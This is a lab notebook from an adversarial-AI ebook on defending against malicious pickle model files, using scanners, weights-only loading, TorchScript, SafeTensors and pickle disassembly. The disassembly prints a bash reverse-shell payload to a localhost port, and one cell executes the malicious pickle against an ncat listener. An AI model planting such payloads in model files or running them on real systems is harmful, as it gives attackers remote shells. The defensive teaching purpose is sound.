<img style="max-width:20em; height:auto;" src="../graphics/A-Little-Book-on-Adversarial-AI-Cover.png"/>

Author: Nik Alleyne   
Author Blog: https://www.securitynik.com   
Author GitHub: github.com/securitynik   

Author Other Books: [   

            "https://www.amazon.ca/Learning-Practicing-Leveraging-Practical-Detection/dp/1731254458/",   
            
            "https://www.amazon.ca/Learning-Practicing-Mastering-Network-Forensics/dp/1775383024/"   
        ]   


This notebook ***(fickling_mitigations.ipynb)*** is part of the series of notebooks from ***A Little Book on Adversarial AI***, a free ebook released by Nik Alleyne.

### Fickling Mitigations 

### Lab Objectives:   
- Implement mitigations to address the pickle file format vulnerability   
- Look at additional ways to address the risk associated with model modification   


### Step 1:  

In [1]:
# Import some libraries
import torch
import torch.nn as nn
import torch.nn.functional as F

In [2]:
### Version of key libraries used  
print(f'Torch version used:  {torch.__version__}')

Torch version used:  2.7.1+cu128


In [3]:
# Set up the device to work with
# If an accelerator such as CUDA or Apple's MPS backend is available,
# we take advantage of it; otherwise we fall back to the CPU.

if torch.cuda.is_available():
    print('Setting the device to cuda')
    device = 'cuda'
elif torch.backends.mps.is_available():
    print('Setting the device to Apple mps')
    device = 'mps'
else:
    print('Setting the device to CPU')
    device = 'cpu'

Setting the device to cuda


In [4]:
# Recall the models we have used so far and scan them with picklescan
# picklescan can target both a single file and a directory

In [5]:
# Let's start with scanning
# picklescan reports a dangerous import,
# specifically the builtins exec function
!picklescan --path /tmp/my_trusted_simple_model.pth

/tmp/my_trusted_simple_model.pth:my_trusted_simple_model/data.pkl: dangerous import 'builtins exec' FOUND
----------- SCAN SUMMARY -----------
Scanned files: 1
Infected files: 1
Dangerous globals: 1


In [6]:
# We can also use the fickling library, which was used to create the malicious pickle, to trace it
# Interesting: we know we compromised this file,
# and picklescan above reports it as infected
# We used --trace earlier on a raw pickle file; this file uses Torch's newer zip-based format
!fickling --trace /tmp/my_trusted_simple_model.pth

Error: No pickle files detected
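
Because the file uses Torch's zip-based format, the pickle stream sits inside the archive (picklescan reported it above as `my_trusted_simple_model/data.pkl`). Here is a minimal sketch, using only the standard library, that lists the globals imported by any `.pkl` member without unpickling anything. The helper name `list_pickle_imports` and the string-tracking heuristic for `STACK_GLOBAL` are assumptions made for illustration; this is not how picklescan or fickling work internally.

```python
import os
import pickletools
import zipfile

# Opcodes that push a text string onto the pickle stack
STRING_OPCODES = {"SHORT_BINUNICODE", "BINUNICODE", "BINUNICODE8", "UNICODE"}


def list_pickle_imports(archive_path):
    """Return (member, module, name) for globals imported by pickles inside a zip archive."""
    found = []
    with zipfile.ZipFile(archive_path) as archive:
        for member in archive.namelist():
            if not member.endswith(".pkl"):
                continue
            recent_strings = []
            # genops only parses the opcode stream; it never executes it
            for opcode, arg, _pos in pickletools.genops(archive.read(member)):
                if opcode.name in STRING_OPCODES:
                    recent_strings.append(arg)
                elif opcode.name == "GLOBAL":
                    # GLOBAL carries "module name" as one space-separated argument
                    module, name = arg.split(" ", 1)
                    found.append((member, module, name))
                elif opcode.name == "STACK_GLOBAL" and len(recent_strings) >= 2:
                    # Heuristic: assume the two most recent strings are module and name
                    found.append((member, recent_strings[-2], recent_strings[-1]))
    return found


model_path = "/tmp/my_trusted_simple_model.pth"
if os.path.exists(model_path) and zipfile.is_zipfile(model_path):
    for member, module, name in list_pickle_imports(model_path):
        print(f"{member}: imports {module}.{name}")
```

A legitimate checkpoint will also list imports (for example, tensor rebuild helpers), so the output is something to review against what you expect rather than a verdict on its own.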


In [7]:
# let us try another tool.
# This time we use modelscan
!modelscan -p /tmp/my_trusted_simple_model.pth

/bin/bash: line 1: modelscan: command not found


In [8]:
# We can build on this with static analysis by running strings on our samples
#!strings --all --bytes=10 /tmp/r_forest.onnx

In [9]:
# If you are interested, you can also look at the raw bytes via a hex editor
!xxd -l 64 /tmp/r_forest.onnx

00000000: 080a 1208 736b 6c32 6f6e 6e78 1a06 312e  ....skl2onnx..1.
00000010: 3139 2e31 2207 6169 2e6f 6e6e 7828 0032  19.1".ai.onnx(.2
00000020: 003a d795 050a d893 050a 01
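
The first few bytes of a file already hint at its container format. Here is a minimal sketch, assuming the hypothetical helper name `sniff_model_format`: Torch's zip-based checkpoints begin with the ZIP signature `PK\x03\x04`, and pickles written with protocol 2 or later begin with the `PROTO` opcode `\x80` followed by the protocol number. ONNX files are protobuf messages with no fixed magic number, so they fall through to `unknown` here.

```python
def sniff_model_format(path):
    """Classify a file by its leading bytes: 'zip', 'pickle' or 'unknown'."""
    with open(path, "rb") as handle:
        head = handle.read(4)
    if head.startswith(b"PK\x03\x04"):
        # ZIP local file header, used by Torch's zip-based checkpoints
        return "zip"
    if len(head) >= 2 and head[0] == 0x80 and 2 <= head[1] <= 5:
        # PROTO opcode followed by a protocol number between 2 and 5
        return "pickle"
    return "unknown"
```

A result of `zip` says nothing about safety on its own, since the archive can still contain a pickle; it only tells us where to look next.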

In [10]:
# First, we can ensure if we don't trust the source of the model, 
# that we load only the weights and not the full model
# This can be achieved by
with torch.no_grad():
    loaded_trusted_pwnd_model = torch.load('/tmp/my_trusted_simple_model.pth', weights_only=True)
    
#loaded_trusted_pwnd_model


UnpicklingError: Weights only load failed. This file can still be loaded, to do so you have two options, do those steps only if you trust the source of the checkpoint. 
	(1) In PyTorch 2.6, we changed the default value of the `weights_only` argument in `torch.load` from `False` to `True`. Re-running `torch.load` with `weights_only` set to `False` will likely succeed, but it can result in arbitrary code execution. Do it only if you got the file from a trusted source.
	(2) Alternatively, to load with `weights_only=True` please check the recommended steps in the following error message.
	WeightsUnpickler error: Unsupported global: GLOBAL exec was not an allowed global by default. Please use `torch.serialization.add_safe_globals([exec])` or the `torch.serialization.safe_globals([exec])` context manager to allowlist this global if you trust this class/function.

Check the documentation of torch.load to learn more about types accepted by default with weights_only https://pytorch.org/docs/stable/generated/torch.load.html.

The load above fails, which means we cannot use this model when loading the weights only. However, pay close attention to the last few lines of the error.  
As seen in those last few lines, there is the message  
**WeightsUnpickler error: Unsupported global: GLOBAL builtins.exec was not an allowed global by default**  
This immediately tells us there might be a problem with this file. We also see  
Re-running `torch.load` with `weights_only` set to `False` will likely succeed, **but it can result in arbitrary code execution. Do it only if you got the file from a trusted source.**

So earlier, we were able to run arbitrary code because we loaded the file with *weights_only=False*.   
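
The `weights_only=True` check behaves like an allowlist of globals that the unpickler is permitted to import. Here is a minimal standard-library sketch of that idea, following the "restricting globals" pattern from the Python `pickle` documentation. The names `AllowlistUnpickler` and `restricted_loads`, and the contents of `ALLOWED_GLOBALS`, are illustrative assumptions; this is not PyTorch's actual implementation.

```python
import io
import pickle

# Assumption: a deliberately tiny allowlist, chosen only for this illustration
ALLOWED_GLOBALS = {
    ("collections", "OrderedDict"),
    ("builtins", "complex"),
}


class AllowlistUnpickler(pickle.Unpickler):
    def find_class(self, module, name):
        # Called whenever the pickle stream asks to import a global
        if (module, name) in ALLOWED_GLOBALS:
            return super().find_class(module, name)
        raise pickle.UnpicklingError(f"global '{module}.{name}' is not allowed")


def restricted_loads(data):
    """Unpickle bytes, refusing any global that is not on the allowlist."""
    return AllowlistUnpickler(io.BytesIO(data)).load()
```

A stream that tries to import `builtins.exec` raises `UnpicklingError` before anything is called, which mirrors the failure we saw above.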


### Step 2:   

In [11]:
# Bring back some data
# Create a dummy dataset
from sklearn.datasets import make_classification

X, y = make_classification(n_samples=100, n_classes=2, random_state=10)
X = torch.tensor(data=X, dtype=torch.float32, device=device)
y = torch.tensor(data = y.reshape(-1, 1), dtype=torch.float32, device=device)

In [12]:
# Re-create a simple torch network
class SimpleNet(nn.Module):
    def __init__(self,):
        super().__init__()
        self.layers = nn.Sequential( 
            nn.Linear(in_features=X.size(dim=1), out_features=8),
            nn.ReLU(),
            nn.Linear(in_features=8, out_features=1),
            nn.Sigmoid()
        )
    
    def forward(self, x):
        out = self.layers(x)
        return out

In [13]:
# If you wish to test the model's ability to make predictions
simple_net = SimpleNet().to(device=device)
simple_net(X)[:10]

tensor([[0.5052],
        [0.4907],
        [0.4782],
        [0.3982],
        [0.3448],
        [0.3816],
        [0.4295],
        [0.5640],
        [0.3775],
        [0.5036]], device='cuda:0', grad_fn=<SliceBackward0>)

In [14]:
# Let's try a different approach. I RECOMMEND USING THIS!
# In this instance, let's use TorchScript.
# TorchScript is a very common way to package a model for inference
# Generally, when we save our model, it is for someone else to use for inference.
# Let's use that format instead

simple_model = SimpleNet().to(device=device)
more_secured_model = torch.jit.script(obj=simple_model)
more_secured_model.save(f='/tmp/my_more_secured_model.pth')

# Verify the file was created
!ls /tmp/my_more_secured_model.pth

# Get the file integrity
!md5sum /tmp/my_more_secured_model.pth


/tmp/my_more_secured_model.pth
1bd188e550f27eefb2945228d41b1378  /tmp/my_more_secured_model.pth
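
MD5 is fine for spotting accidental corruption, but MD5 collisions can be crafted deliberately, so a stronger digest such as SHA-256 is generally preferred for tamper detection. Here is a minimal sketch, assuming the hypothetical helper names `sha256_of_file` and `verify_file`, and assuming the expected digest was recorded somewhere trusted when the model was saved.

```python
import hashlib
import hmac


def sha256_of_file(path, chunk_size=1024 * 1024):
    """Hash a file in chunks so large models do not need to fit in memory."""
    digest = hashlib.sha256()
    with open(path, "rb") as handle:
        for chunk in iter(lambda: handle.read(chunk_size), b""):
            digest.update(chunk)
    return digest.hexdigest()


def verify_file(path, expected_hex):
    """Return True only if the file's SHA-256 digest matches the expected value."""
    # compare_digest avoids leaking how many leading characters matched
    return hmac.compare_digest(sha256_of_file(path), expected_hex.lower())
```

The check is only as trustworthy as the place the expected digest is stored; keeping it next to the model file in the same directory gives an attacker the chance to replace both.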


In [15]:
# We can then load this model to make inference
loaded_secured_model = torch.jit.load(f='/tmp/my_more_secured_model.pth', map_location=device)
loaded_secured_model

RecursiveScriptModule(
  original_name=SimpleNet
  (layers): RecursiveScriptModule(
    original_name=Sequential
    (0): RecursiveScriptModule(original_name=Linear)
    (1): RecursiveScriptModule(original_name=ReLU)
    (2): RecursiveScriptModule(original_name=Linear)
    (3): RecursiveScriptModule(original_name=Sigmoid)
  )
)

In [16]:
# Put the model in eval mode
# Calling .eval() switches layers such as batch normalization and dropout to their inference behaviour
# In this case we don't have those layers
# However, it is a good habit to call this method
loaded_secured_model.eval()

# Make a sample prediction, to confirm the model is working well
loaded_secured_model(X[:5])

tensor([[0.6325],
        [0.5591],
        [0.5844],
        [0.5642],
        [0.5455]], device='cuda:0', grad_fn=<SigmoidBackward0>)

### Step 3:   

# SafeTensors  
- https://huggingface.co/docs/safetensors/index
- https://github.com/huggingface/safetensors
- Alternatively, we can use SafeTensors, a format that is gaining popularity
- It does require a bit more work, so let's walk through that work

In [17]:
# importing the safetensors library
from safetensors.torch import save_file, safe_open

In [18]:
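# Verify the layers we have
# Note: state_dict is referenced without parentheses, so the output below is
# the bound method's repr, which includes the model's layers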
simple_model.state_dict

<bound method Module.state_dict of SimpleNet(
  (layers): Sequential(
    (0): Linear(in_features=20, out_features=8, bias=True)
    (1): ReLU()
    (2): Linear(in_features=8, out_features=1, bias=True)
    (3): Sigmoid()
  )
)>

In [19]:
# Grab the weight and bias of the first layer as a sample
tmp_safe_tensor = {
    'fc1.weight' : simple_model.layers[0].weight,
    'fc1.bias' : simple_model.layers[0].bias
}


In [20]:
# In reality, no one wants to do that by hand for a model that has many layers, so let's make this a bit simpler
# Setup an empty dictionary
simple_model_safe_tensors = {}

# Automate the process of creating the keys and values
for name, tensor in simple_model.state_dict().items():
    simple_model_safe_tensors[name] = tensor

# Verify the dictionary has been properly created
simple_model_safe_tensors

{'layers.0.weight': tensor([[ 0.1340,  0.0428,  0.1601,  0.1333,  0.1239,  0.1645, -0.0590, -0.1074,
          -0.0420,  0.1007, -0.0829, -0.0661,  0.1732, -0.0977, -0.0719,  0.1165,
           0.1505,  0.1343,  0.0481, -0.0843],
         [-0.1467, -0.0027, -0.1441, -0.2104,  0.1514, -0.1792,  0.2200, -0.1609,
           0.2206, -0.1045,  0.2210, -0.2003,  0.0717,  0.1599, -0.1202, -0.0942,
           0.0315, -0.0715, -0.1693, -0.1950],
         [-0.0473,  0.1902, -0.0504, -0.0600,  0.0421, -0.0924,  0.2086,  0.0063,
           0.0369, -0.1246, -0.0786, -0.0630, -0.0231, -0.1015, -0.0784,  0.1539,
           0.1334,  0.1037,  0.2185,  0.1916],
         [-0.0980, -0.0822, -0.1821, -0.0688,  0.1837, -0.1766, -0.0271,  0.0261,
           0.1777, -0.1705, -0.0655, -0.2209,  0.0266,  0.0619, -0.2003, -0.1742,
           0.0639, -0.0142,  0.0181,  0.1082],
         [-0.1875,  0.1406,  0.0788,  0.0143,  0.1283, -0.1361,  0.1421, -0.0797,
          -0.1659,  0.0244, -0.0199, -0.0388, -0.0943, 

In [21]:
# Now let's save the model
# Optionally, we can add some metadata via a dictionary of strings
save_file(tensors=simple_model_safe_tensors, filename=r'/tmp/simple_model.safetensors', metadata={'Author' : 'SecurityNik', 'course': 'SANS SEC 5'})

# Verify the file is saved
!ls /tmp/simple_model.safetensors

# Verify the file integrity
!md5sum /tmp/simple_model.safetensors


/tmp/simple_model.safetensors
fe1c568f98808892213f7ee4e9cc2437  /tmp/simple_model.safetensors
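
Part of what makes this format safer is its layout: an 8-byte little-endian header length, a JSON header describing each tensor, then the raw tensor bytes, with nothing executable to deserialize. Here is a minimal sketch that reads only the header using the standard library. `read_safetensors_header` is a hypothetical helper name and the size cap is an arbitrary assumption.

```python
import json
import os
import struct

# Assumption: an arbitrary sanity cap so a corrupt length cannot trigger a huge read
MAX_HEADER_BYTES = 100 * 1024 * 1024


def read_safetensors_header(path):
    """Return (metadata, tensor_index) parsed from a safetensors file header."""
    with open(path, "rb") as handle:
        (header_len,) = struct.unpack("<Q", handle.read(8))
        if header_len > MAX_HEADER_BYTES:
            raise ValueError(f"header length {header_len} exceeds the sanity cap")
        header = json.loads(handle.read(header_len).decode("utf-8"))
    # Free-form string metadata lives under the reserved "__metadata__" key
    metadata = header.pop("__metadata__", {})
    return metadata, header


safetensors_path = "/tmp/simple_model.safetensors"
if os.path.exists(safetensors_path):
    metadata, tensors = read_safetensors_header(safetensors_path)
    print(metadata)
    for name, info in tensors.items():
        print(name, info["dtype"], info["shape"])
```

Each tensor entry carries only a dtype, a shape, and byte offsets into the data section, so inspecting the file never requires importing or calling anything named by the file itself.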


In [22]:
# Fine, let's reload the model now to make predictions.
loaded_safe_tensor_state_dict = {}
with safe_open(filename=r'/tmp/simple_model.safetensors', framework='pt') as safe_model:
    for key in safe_model.keys():
        loaded_safe_tensor_state_dict[key] = safe_model.get_tensor(key)

# View the loaded model
loaded_safe_tensor_state_dict

{'layers.0.bias': tensor([-0.1662,  0.2066,  0.1746,  0.1116, -0.0554, -0.0147,  0.0900, -0.1279]),
 'layers.0.weight': tensor([[ 0.1340,  0.0428,  0.1601,  0.1333,  0.1239,  0.1645, -0.0590, -0.1074,
          -0.0420,  0.1007, -0.0829, -0.0661,  0.1732, -0.0977, -0.0719,  0.1165,
           0.1505,  0.1343,  0.0481, -0.0843],
         [-0.1467, -0.0027, -0.1441, -0.2104,  0.1514, -0.1792,  0.2200, -0.1609,
           0.2206, -0.1045,  0.2210, -0.2003,  0.0717,  0.1599, -0.1202, -0.0942,
           0.0315, -0.0715, -0.1693, -0.1950],
         [-0.0473,  0.1902, -0.0504, -0.0600,  0.0421, -0.0924,  0.2086,  0.0063,
           0.0369, -0.1246, -0.0786, -0.0630, -0.0231, -0.1015, -0.0784,  0.1539,
           0.1334,  0.1037,  0.2185,  0.1916],
         [-0.0980, -0.0822, -0.1821, -0.0688,  0.1837, -0.1766, -0.0271,  0.0261,
           0.1777, -0.1705, -0.0655, -0.2209,  0.0266,  0.0619, -0.2003, -0.1742,
           0.0639, -0.0142,  0.0181,  0.1082],
         [-0.1875,  0.1406,  0.0788, 

In [23]:
# Re-create a simple torch network
class SimpleModelReconstructed(nn.Module):
    def __init__(self,):
        super().__init__()
        self.layers = nn.Sequential( 
            nn.Linear(in_features=X.size(dim=1), out_features=8),
            nn.ReLU(),
            nn.Linear(in_features=8, out_features=1),
            nn.Sigmoid()
        )
    
    def forward(self, x):
        out = self.layers(x)
        return out

In [24]:
# Instantiate the model
simple_model_reconstructed = SimpleModelReconstructed().to(device=device)
simple_model_reconstructed

SimpleModelReconstructed(
  (layers): Sequential(
    (0): Linear(in_features=20, out_features=8, bias=True)
    (1): ReLU()
    (2): Linear(in_features=8, out_features=1, bias=True)
    (3): Sigmoid()
  )
)

In [25]:
# Load the state dictionary
simple_model_reconstructed.load_state_dict(state_dict=loaded_safe_tensor_state_dict)

<All keys matched successfully>

In [26]:
# Make predictions on the new model
simple_model_reconstructed(X[:10])

tensor([[0.6325],
        [0.5591],
        [0.5844],
        [0.5642],
        [0.5455],
        [0.5283],
        [0.5937],
        [0.5100],
        [0.5327],
        [0.6260]], device='cuda:0', grad_fn=<SigmoidBackward0>)

With all of these strategies in place, there is still the simplest one we can use: encrypt the saved models, hash them, and store the keys and hashes in environment variables. With this strategy, there is also no need for us to import the other modules.

Revisit the notebook **hash_enc_logging.ipynb** for additional guidance.  
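
As one piece of that strategy, a keyed hash (HMAC) ties the integrity check to a secret, so someone who can replace the model file cannot simply recompute the hash. Here is a minimal sketch using only the standard library. The environment variable names `MODEL_HMAC_KEY` and `MODEL_HMAC_TAG` are hypothetical, encryption is left out, and this is not the code from **hash_enc_logging.ipynb**.

```python
import hashlib
import hmac
import os


def hmac_of_file(path, key):
    """Compute an HMAC-SHA256 tag over the file contents, reading in chunks."""
    mac = hmac.new(key, digestmod=hashlib.sha256)
    with open(path, "rb") as handle:
        for chunk in iter(lambda: handle.read(1024 * 1024), b""):
            mac.update(chunk)
    return mac.hexdigest()


def model_is_untampered(path, env=os.environ):
    """Check the file against the key and tag held in the environment."""
    key = env.get("MODEL_HMAC_KEY")       # hypothetical variable name
    expected = env.get("MODEL_HMAC_TAG")  # hypothetical variable name
    if not key or not expected:
        return False  # fail closed when the secret or the tag is missing
    return hmac.compare_digest(hmac_of_file(path, key.encode("utf-8")), expected)
```

The idea is to call `model_is_untampered` before handing the path to any loader, and to refuse to load when it returns `False`.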

### Step 4:  

In [27]:
# As a final step, if you wish to dig a bit deeper, we can disassemble the pickle file
# https://docs.python.org/3/library/pickletools.html
import pickletools

In [28]:
# This is one option to load the pickle: running the pickle module as a script unpickles the file
# However, this should only be used for files you trust, because unpickling runs the embedded payload
# In this case, the payload starts bash and attempts to connect to a remote host
# Ensure you set up your listener first
#   $ ncat --listen --verbose 9999 
!python -m pickle /tmp/malicious.pkl

0


In [29]:
# Let's try this the correct way now
# The disassembly shows us the 'posix' module
# We also see the 'system' function
# and finally the backdoor command
# As you should have noticed, this did not attempt to run the payload but simply disassembled it
!python -m pickletools /tmp/malicious.pkl

    0: \x80 PROTO      4
    2: \x95 FRAME      83
   11: \x8c SHORT_BINUNICODE 'posix'
   18: \x94 MEMOIZE    (as 0)
   19: \x8c SHORT_BINUNICODE 'system'
   27: \x94 MEMOIZE    (as 1)
   28: \x93 STACK_GLOBAL
   29: \x94 MEMOIZE    (as 2)
   30: \x8c SHORT_BINUNICODE "/bin/bash -c 'bash -i >& /dev/tcp/127.0.0.1/9999 0>&1 &'"
   88: \x94 MEMOIZE    (as 3)
   89: \x85 TUPLE1
   90: \x94 MEMOIZE    (as 4)
   91: R    REDUCE
   92: \x94 MEMOIZE    (as 5)
   93: .    STOP
highest protocol among opcodes = 4
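
The `posix` / `system` / `REDUCE` sequence above is what `pickle` emits when an object's `__reduce__` method returns a callable together with its arguments. Here is a minimal sketch that builds such a pickle with a harmless command and disassembles it without ever loading it. The class name `Demo` and the `echo` command are illustrative assumptions.

```python
import io
import os
import pickle
import pickletools


class Demo:
    def __reduce__(self):
        # If this pickle were ever loaded, pickle would call os.system("echo hello")
        return (os.system, ("echo hello",))


# Serializing only records the callable and its arguments; nothing is executed here
payload = pickle.dumps(Demo(), protocol=4)

# Disassemble into a string instead of loading the pickle
listing = io.StringIO()
pickletools.dis(payload, out=listing)
disassembly = listing.getvalue()
print(disassembly)
```

The callable is pushed by `STACK_GLOBAL`, its argument tuple by `TUPLE1`, and `REDUCE` is the opcode that would perform the call at load time, which is why scanners pay attention to which globals a pickle imports.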


In [30]:
# Let's extend on this a bit to understand what some of these opcodes are doing
!python -m pickletools --annotate /tmp/malicious.pkl

    0: \x80 PROTO      4              Protocol version indicator.
    2: \x95 FRAME      83             Indicate the beginning of a new frame.
   11: \x8c SHORT_BINUNICODE 'posix'  Push a Python Unicode string object.
   18: \x94 MEMOIZE    (as 0)         Store the stack top into the memo.  The stack is not popped.
   19: \x8c SHORT_BINUNICODE 'system' Push a Python Unicode string object.
   27: \x94 MEMOIZE    (as 1)         Store the stack top into the memo.  The stack is not popped.
   28: \x93 STACK_GLOBAL              Push a global object (module.attr) on the stack.
   29: \x94 MEMOIZE    (as 2)         Store the stack top into the memo.  The stack is not popped.
   30: \x8c SHORT_BINUNICODE "/bin/bash -c 'bash -i >& /dev/tcp/127.0.0.1/9999 0>&1 &'" Push a Python Unicode string object.
   88: \x94 MEMOIZE    (as 3)         Store the stack top into the memo.  The stack is not popped.
   89: \x85 TUPLE1                    Build a one-tuple out of the topmost item on the stack.
   90

In this final mitigation, as you can see, we have multiple layers in place. We are taking advantage of hashing, encryption, and validation of the file path and, more importantly, using the ONNX format, which scikit-learn considers the most secure way to save a model at the time of this writing.
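
The file-path validation layer can be sketched as follows, assuming a hypothetical trusted directory, a hypothetical helper name `resolve_model_path`, and an assumed set of allowed extensions. It resolves symlinks and `..` segments before checking that the file stays inside the trusted directory.

```python
from pathlib import Path

# Assumption: only these formats are accepted in this illustration
ALLOWED_SUFFIXES = {".onnx", ".safetensors"}


def resolve_model_path(candidate, trusted_dir):
    """Return the resolved path, or raise ValueError if it fails validation."""
    trusted = Path(trusted_dir).resolve()
    resolved = Path(candidate).resolve()
    # After resolution, the trusted directory must be an ancestor of the file
    if trusted not in resolved.parents:
        raise ValueError(f"{resolved} is outside the trusted directory {trusted}")
    if resolved.suffix not in ALLOWED_SUFFIXES:
        raise ValueError(f"unexpected model file extension: {resolved.suffix!r}")
    return resolved
```

Checking the resolved path rather than the raw string is the design choice that matters here, since a string such as `models/../../etc/passwd` starts with the right prefix but points somewhere else entirely.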

While we have used some interesting ways of gaining access to systems via the models, there is nothing stopping you from using a Metasploit payload. Maybe you are interested in Cobalt Strike instead?


https://hiddenlayer.com/innovation-hub/pickle-strike/


### Lab Takeaways:   
- We've now looked at ways to mitigate the threat of our models being modified   